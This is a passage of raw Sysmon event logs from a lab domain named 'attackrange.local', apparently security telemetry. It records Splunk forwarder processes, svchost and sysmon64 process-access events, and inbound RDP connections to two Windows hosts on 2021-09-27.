Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976732Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:25.921{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-88A1-6151-8179-00000000FD01}3888C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976731Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:25.906{69CF5F33-88A1-6151-8179-00000000FD01}3888C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976730Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:25.546{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35590C9C96010BC936F75BB2ED0D6E9C,SHA256=E36D95571E3C2330FCCE54321D6E385465CD29901A81C496AE18A4C1D4F45DAF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048169Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:23.224{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com51892-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048168Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:25.168{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1273E0490BCC7ED3CBCB2BC58EAF05E3,SHA256=2EBD5C71835CB12315ADE655BD9923177BC2424FBDE29D1FBDC14A40B8E52D69,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976729Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:22.134{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56792-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976728Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:21.847{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59270-false10.0.1.12-8000- 354300x8000000000000000976727Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:21.716{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com50905-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976726Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:25.015{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=55C9C81CFDFE35CCFDD255CB201751D0,SHA256=E9FCF51D25CD4869C2704E00BEA11C39AE84C24278C1395D74660F46B1EFE74B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976760Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.952{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=91870E138190164838C7C0F12583041A,SHA256=CADB887DE6C427BC873D1DF434BA4BB8C588FDCC7F9F6B77129B31491EEF2DFF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976759Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.874{69CF5F33-88A2-6151-8279-00000000FD01}34284036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976758Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.608{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-88A2-6151-8279-00000000FD01}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976757Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.608{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976756Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.608{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976755Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.608{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976754Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.608{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976753Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.608{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976752Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.608{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976751Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.608{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976750Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.608{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976749Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.608{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976748Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.608{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-88A2-6151-8279-00000000FD01}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976747Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.608{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-88A2-6151-8279-00000000FD01}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976746Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.594{69CF5F33-88A2-6151-8279-00000000FD01}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976745Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.593{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AB90DF7F97EB000A24F7BE33F6E6112,SHA256=296AB405D2F87ED78DEE83FD0D3E84F9DDB4228824828C8405FE6905E43A92E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048170Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:26.086{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=616F5B72F12F85BB4D3B621077494CEE,SHA256=4933BE13B8075324ED1C3F6AA26385985B253D67ED5AD9D04D6BE324010703BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976744Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.108{69CF5F33-88A1-6151-8179-00000000FD01}38882844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976786Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.983{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-88A3-6151-8479-00000000FD01}512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976785Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976784Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976783Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976782Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976781Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 